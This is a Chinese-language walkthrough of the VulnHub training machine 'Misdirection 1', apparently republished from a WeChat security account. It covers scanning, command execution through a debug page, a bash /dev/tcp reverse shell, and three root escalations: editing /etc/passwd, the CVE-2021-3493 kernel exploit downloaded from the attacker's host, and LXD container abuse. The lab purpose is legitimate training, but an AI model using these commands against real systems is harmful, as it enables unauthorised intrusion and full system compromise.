OSCP难度靶机之Misdirection 1

admin 2022年4月3日11:35:49评论96 views字数 1760阅读5分52秒阅读模式

虚拟机信息:

虚拟机下载地址:https://www.vulnhub.com/entry/misdirection-1,371/

虚拟机简介:初学者基于现实生活的机器,旨在教人们从内部理解的重要性。

目标:1个flag

级别:初级

1、主机探测

1、通过netdiscover检测主机IP地址

netdiscover -r 192.168.207.0/24

OSCP难度靶机之Misdirection 1

2、服务探测

1、通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.145

查看开放22、80、3306、8080端口

OSCP难度靶机之Misdirection 1

3、渗透测试

3.1 HTTP服务探测

1.使用dirb进行服务探测

dirb http://192.168.207.141


2.使用gobuter进行爆破

gobuster dir -u http://192.168.207.141:8080  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x html,php,txt -q -k -f

查看网页存在目录

OSCP难度靶机之Misdirection 1

3.发现debug目录中可以执行命令

OSCP难度靶机之Misdirection 1

4.反弹shell连接

bash -c 'bash -i >& /dev/tcp/192.168.207.129/4444 0>&1 &'

OSCP难度靶机之Misdirection 1

获取到反弹shell连接

OSCP难度靶机之Misdirection 1

3.2 查看sudo权限

1.查看sudo权限

sudo -l

OSCP难度靶机之Misdirection 1

2.指定账号执行命令

sudo -u brexit /bin/bash

OSCP难度靶机之Misdirection 1

3.使用python创建pty

python -c 'import pty; pty.spawn("/bin/bash")'

OSCP难度靶机之Misdirection 1

3.3 提权方式1

1.查看brexit有/etc/passwd写入权限

ls -lah /etc/passwd

OSCP难度靶机之Misdirection 1

2.使用kali生成密码

openssl passwd -1 -salt user3 pass123

OSCP难度靶机之Misdirection 1

3.写入密码文件

echo 'hack:$1$user3$rAGRVf5p2jYTqtqOW5cPu/:0:0::/root:/bin/bash' >>/etc/passwd
su - hack

OSCP难度靶机之Misdirection 1

3.4 提权方式2-Linux内核提权

1.在kali编译文件

git clone https://github.com/briskets/CVE-2021-3493.git

OSCP难度靶机之Misdirection 1

2.编译文件

cd CVE-2021-3493
gcc -o shell exploit.c

OSCP难度靶机之Misdirection 1

3.配置http服务

python -m http.server 8888

OSCP难度靶机之Misdirection 1

4.在靶机下载编译好文件

cd /tmp
wget http://192.168.207.129:8888/shell
chmod +x shell
./shell

OSCP难度靶机之Misdirection 1

3.5 提权方式3-LXC提权

1.查看用户权限存在lxd组权限

OSCP难度靶机之Misdirection 1

2.查看本地镜像

lxc image list

本地不存在镜像

OSCP难度靶机之Misdirection 1

3.在kali中创建lxc镜像

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

OSCP难度靶机之Misdirection 1

查看编译后的文件

OSCP难度靶机之Misdirection 1

4.创建简单http服务

python -m http.server 8080

OSCP难度靶机之Misdirection 1

wget http://192.168.207.129:8080/alpine-v3.13-x86_64-20210218_0139.tar.gz

OSCP难度靶机之Misdirection 1

5.导入本地镜像

lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias testimage
lxc image list

OSCP难度靶机之Misdirection 1

6.初始化lxc环境

# 初始化lxc
lxd init

一路回车即可

OSCP难度靶机之Misdirection 1

7.导入并运行镜像

lxc init testimage privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh

OSCP难度靶机之Misdirection 1

8.配置suid权限

chmod +s /mnt/root/bin/bash

OSCP难度靶机之Misdirection 1

9.退出容器查看权限

ls -lah /bin/bash

OSCP难度靶机之Misdirection 1

bash -p
whoami

已经获取到root权限

OSCP难度靶机之Misdirection 1


原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Misdirection 1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月3日11:35:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之Misdirection 1http://cn-sec.com/archives/866107.html

发表评论

匿名网友 填写信息